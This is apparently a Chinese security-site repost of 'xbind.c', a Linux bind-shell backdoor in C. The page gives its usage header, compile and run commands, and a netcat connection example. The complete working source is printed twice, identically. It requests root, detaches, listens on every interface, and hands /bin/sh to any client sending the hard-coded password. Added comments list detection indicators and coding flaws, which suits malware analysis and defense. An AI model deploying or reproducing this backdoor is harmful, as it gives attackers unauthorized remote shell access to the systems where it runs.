linux下的后门:xbind.c 's

admin 2017年4月24日11:18:04评论260 views字数 2324阅读7分44秒阅读模式
摘要

/*------------------------------------------------------
xbind.c A bindshell backdoor on linux
c0de by xy7[B.C.T]
Mail:[email protected]
Our te4m:www.cnbct.org
Compile:
gcc -o xbind xbind.c
run now:
./xbind 1985
C:/>nc -vv 192.168.1.52 1985
192.168.1.52: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [192.168.1.52] 1985 (?) open
Enert your password: cnbct
Welcome to shell
let's do it:
-------------------------------------------------------*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

/*
 * Strings compiled into the binary and sent over the socket in clear text.
 * For analysis they double as static and network indicators: the prompt
 * (including its "Enert" misspelling), the welcome banner and the password
 * are all visible to `strings` on the binary and in a packet capture.
 * NOTE(review): the "/0" and "/r/n" sequences are shown with forward slashes
 * on this page; presumably the original used backslash escapes and the page
 * rendering altered them -- confirm against an original copy before writing
 * byte-exact signatures.
 */
#define ENTERPASS "Enert your password: /0"
#define WELCOME "Welcome to shell/r/nlet's do it:/r/n"
/* Hard-coded plaintext credential, identical in every build of this source. */
#define PASSWORD "cnbct"
/*
 * Entry point of the bind-shell sample, annotated for analysis.
 *
 * Flow as written: request uid/gid 0, detach with fork(), listen on the TCP
 * port given in argv[1] on every interface, then give /bin/sh to a client
 * whose first bytes match the hard-coded PASSWORD.
 *
 * Host and network observables a defender can key on:
 *   - an unexpected listening TCP socket bound to 0.0.0.0 owned by a process
 *     whose original parent has exited;
 *   - a /bin/sh process whose descriptors 0, 1 and 2 all refer to one TCP
 *     socket;
 *   - the prompt, password and banner crossing the wire unencrypted.
 *
 * Returns 0 only if the accept loop is never entered; every error path
 * calls exit(1).
 */
int main(int argc, char **argv)
{
// Local listening address.
struct sockaddr_in s_addr;
// Peer address filled in by accept(); never read afterwards, so the sample
// keeps no record of who connected.
struct sockaddr_in c_addr;
// Receive buffer for the password attempt.
char buf[1024];
pid_t pid;
// `i` is never used. c_addrsize is an int although accept() takes a
// socklen_t pointer.
int i,sock_descriptor,temp_sock_descriptor,c_addrsize;

// Request root identity. Return values are ignored, so the program carries
// on with whatever identity it already had if these calls fail.
setuid(0);
setgid(0);
seteuid(0);
setegid(0);

// Exactly one argument (the port) is required; otherwise print usage and exit.
if (argc!=2){
printf("=================================/r/n");
printf("|xbind.c by xy7[B.C.T]/r/n");
printf("|Usage:/r/n");
printf("|./xbind 1985/r/n");
printf("|nc -vv targetIP 1985/r/n");
printf("|enter the password to get shell/r/n");
printf("|Have a nice day;)/r/n");
printf("=================================/r/n");
exit(1);

}
// Detach from the launching shell: the parent exits and the child keeps
// running. A failed fork() returns -1, which is also non-zero, so that case
// exits here as well.
if (fork()){
exit(0);
}

// NOTE(review): socket() is called twice. The first descriptor is kept but
// never checked for failure; the second is checked but never stored or
// closed, so the running process holds one extra, unbound TCP socket -- a
// small artifact visible in its open-descriptor list.
sock_descriptor=socket(AF_INET,SOCK_STREAM,0);
if (socket(AF_INET,SOCK_STREAM,0)==-1){
printf("socket failed!");
exit(1);
}
memset(&s_addr,0,sizeof(s_addr));
//bzero(&s_addr,sizeof(s_addr));
s_addr.sin_family=AF_INET;
// INADDR_ANY: the listener is reachable on every interface of the host.
s_addr.sin_addr.s_addr=htonl(INADDR_ANY);
// Port comes straight from argv[1] through atoi(), with no validation.
s_addr.sin_port=htons(atoi(argv[1]));
if (bind(sock_descriptor,(struct sockaddr *)&s_addr,sizeof(s_addr))==-1){
printf("bind failed!");
exit(1);
}
if (listen(sock_descriptor,20)==-1)// 20 is the pending-connection backlog
{
printf("listen failed!");
exit(1);
}
c_addrsize=sizeof(c_addr);
// NOTE(review): accept() is called once, before the loop, and its result is
// not checked for -1.
temp_sock_descriptor=accept(sock_descriptor,(struct sockaddr *)&c_addr,&c_addrsize);
// Per-connection handling: the child authenticates and execs the shell.
// NOTE(review): the loop condition is the descriptor value itself and the
// variable is never reassigned inside the loop, so after the parent closes
// it the parent keeps iterating and forking; on a host this would presumably
// show up as a burst of short-lived child processes after the first client.
while(temp_sock_descriptor){
pid=fork();
if (pid>0) {
// Parent: drop its copy of the client socket and loop again.
close(temp_sock_descriptor);
continue;
}else if (pid==0){
// Child: send the password prompt in clear text.
write(temp_sock_descriptor, ENTERPASS, strlen(ENTERPASS));
// NOTE(review): the fill value is shown as '/0' on this page, which is a
// multi-character constant rather than the NUL byte; presumably '\0' in the
// original -- confirm.
memset(buf, '/0', 1024);
// Return value ignored: errors, a closed peer and short reads are not
// distinguished from a real password attempt.
recv(temp_sock_descriptor, buf, 1024, 0);

// Only the first 5 bytes are compared, so any input that begins with the
// password is accepted. There is no retry limit, delay or logging.
if (strncmp(buf,PASSWORD,5) !=0){
close(temp_sock_descriptor);
exit(1);
}

write(temp_sock_descriptor, WELCOME, strlen(WELCOME));
// Point stdin, stdout and stderr at the client socket, then replace this
// process with /bin/sh. The shell keeps this process's pid and credentials.
dup2(temp_sock_descriptor,0);
dup2(temp_sock_descriptor,1);
dup2(temp_sock_descriptor,2);
execl("/bin/sh", "sh", (char *) 0);
// Reached only if execl() fails.
close(temp_sock_descriptor);
exit(0);
}else{

// fork() failed (pid < 0).
exit(1);
}
}

// Reached only when the loop is never entered, i.e. accept() returned 0.
close(sock_descriptor);
return 0;
}


/*------------------------------------------------------
xbind.c A bindshell backdoor on linux
c0de by xy7[B.C.T]
Mail:[email protected]
Our te4m:www.cnbct.org
Compile:
gcc -o xbind xbind.c
run now:
./xbind 1985
C:/>nc -vv 192.168.1.52 1985
192.168.1.52: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [192.168.1.52] 1985 (?) open
Enert your password: cnbct
Welcome to shell
let's do it:
-------------------------------------------------------*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

/*
 * Strings compiled into the binary and sent over the socket in clear text.
 * For analysis they double as static and network indicators: the prompt
 * (including its "Enert" misspelling), the welcome banner and the password
 * are all visible to `strings` on the binary and in a packet capture.
 * NOTE(review): the "/0" and "/r/n" sequences are shown with forward slashes
 * on this page; presumably the original used backslash escapes and the page
 * rendering altered them -- confirm against an original copy before writing
 * byte-exact signatures.
 */
#define ENTERPASS "Enert your password: /0"
#define WELCOME "Welcome to shell/r/nlet's do it:/r/n"
/* Hard-coded plaintext credential, identical in every build of this source. */
#define PASSWORD "cnbct"
/*
 * Entry point of the bind-shell sample, annotated for analysis.
 *
 * Flow as written: request uid/gid 0, detach with fork(), listen on the TCP
 * port given in argv[1] on every interface, then give /bin/sh to a client
 * whose first bytes match the hard-coded PASSWORD.
 *
 * Host and network observables a defender can key on:
 *   - an unexpected listening TCP socket bound to 0.0.0.0 owned by a process
 *     whose original parent has exited;
 *   - a /bin/sh process whose descriptors 0, 1 and 2 all refer to one TCP
 *     socket;
 *   - the prompt, password and banner crossing the wire unencrypted.
 *
 * Returns 0 only if the accept loop is never entered; every error path
 * calls exit(1).
 */
int main(int argc, char **argv)
{
// Local listening address.
struct sockaddr_in s_addr;
// Peer address filled in by accept(); never read afterwards, so the sample
// keeps no record of who connected.
struct sockaddr_in c_addr;
// Receive buffer for the password attempt.
char buf[1024];
pid_t pid;
// `i` is never used. c_addrsize is an int although accept() takes a
// socklen_t pointer.
int i,sock_descriptor,temp_sock_descriptor,c_addrsize;

// Request root identity. Return values are ignored, so the program carries
// on with whatever identity it already had if these calls fail.
setuid(0);
setgid(0);
seteuid(0);
setegid(0);

// Exactly one argument (the port) is required; otherwise print usage and exit.
if (argc!=2){
printf("=================================/r/n");
printf("|xbind.c by xy7[B.C.T]/r/n");
printf("|Usage:/r/n");
printf("|./xbind 1985/r/n");
printf("|nc -vv targetIP 1985/r/n");
printf("|enter the password to get shell/r/n");
printf("|Have a nice day;)/r/n");
printf("=================================/r/n");
exit(1);

}
// Detach from the launching shell: the parent exits and the child keeps
// running. A failed fork() returns -1, which is also non-zero, so that case
// exits here as well.
if (fork()){
exit(0);
}

// NOTE(review): socket() is called twice. The first descriptor is kept but
// never checked for failure; the second is checked but never stored or
// closed, so the running process holds one extra, unbound TCP socket -- a
// small artifact visible in its open-descriptor list.
sock_descriptor=socket(AF_INET,SOCK_STREAM,0);
if (socket(AF_INET,SOCK_STREAM,0)==-1){
printf("socket failed!");
exit(1);
}
memset(&s_addr,0,sizeof(s_addr));
//bzero(&s_addr,sizeof(s_addr));
s_addr.sin_family=AF_INET;
// INADDR_ANY: the listener is reachable on every interface of the host.
s_addr.sin_addr.s_addr=htonl(INADDR_ANY);
// Port comes straight from argv[1] through atoi(), with no validation.
s_addr.sin_port=htons(atoi(argv[1]));
if (bind(sock_descriptor,(struct sockaddr *)&s_addr,sizeof(s_addr))==-1){
printf("bind failed!");
exit(1);
}
if (listen(sock_descriptor,20)==-1)// 20 is the pending-connection backlog
{
printf("listen failed!");
exit(1);
}
c_addrsize=sizeof(c_addr);
// NOTE(review): accept() is called once, before the loop, and its result is
// not checked for -1.
temp_sock_descriptor=accept(sock_descriptor,(struct sockaddr *)&c_addr,&c_addrsize);
// Per-connection handling: the child authenticates and execs the shell.
// NOTE(review): the loop condition is the descriptor value itself and the
// variable is never reassigned inside the loop, so after the parent closes
// it the parent keeps iterating and forking; on a host this would presumably
// show up as a burst of short-lived child processes after the first client.
while(temp_sock_descriptor){
pid=fork();
if (pid>0) {
// Parent: drop its copy of the client socket and loop again.
close(temp_sock_descriptor);
continue;
}else if (pid==0){
// Child: send the password prompt in clear text.
write(temp_sock_descriptor, ENTERPASS, strlen(ENTERPASS));
// NOTE(review): the fill value is shown as '/0' on this page, which is a
// multi-character constant rather than the NUL byte; presumably '\0' in the
// original -- confirm.
memset(buf, '/0', 1024);
// Return value ignored: errors, a closed peer and short reads are not
// distinguished from a real password attempt.
recv(temp_sock_descriptor, buf, 1024, 0);

// Only the first 5 bytes are compared, so any input that begins with the
// password is accepted. There is no retry limit, delay or logging.
if (strncmp(buf,PASSWORD,5) !=0){
close(temp_sock_descriptor);
exit(1);
}

write(temp_sock_descriptor, WELCOME, strlen(WELCOME));
// Point stdin, stdout and stderr at the client socket, then replace this
// process with /bin/sh. The shell keeps this process's pid and credentials.
dup2(temp_sock_descriptor,0);
dup2(temp_sock_descriptor,1);
dup2(temp_sock_descriptor,2);
execl("/bin/sh", "sh", (char *) 0);
// Reached only if execl() fails.
close(temp_sock_descriptor);
exit(0);
}else{

// fork() failed (pid < 0).
exit(1);
}
}

// Reached only when the loop is never entered, i.e. accept() returned 0.
close(sock_descriptor);
return 0;
}

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 本文由 发表于 2017年4月24日11:18:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   linux下的后门:xbind.c 'shttps://cn-sec.com/archives/49137.html
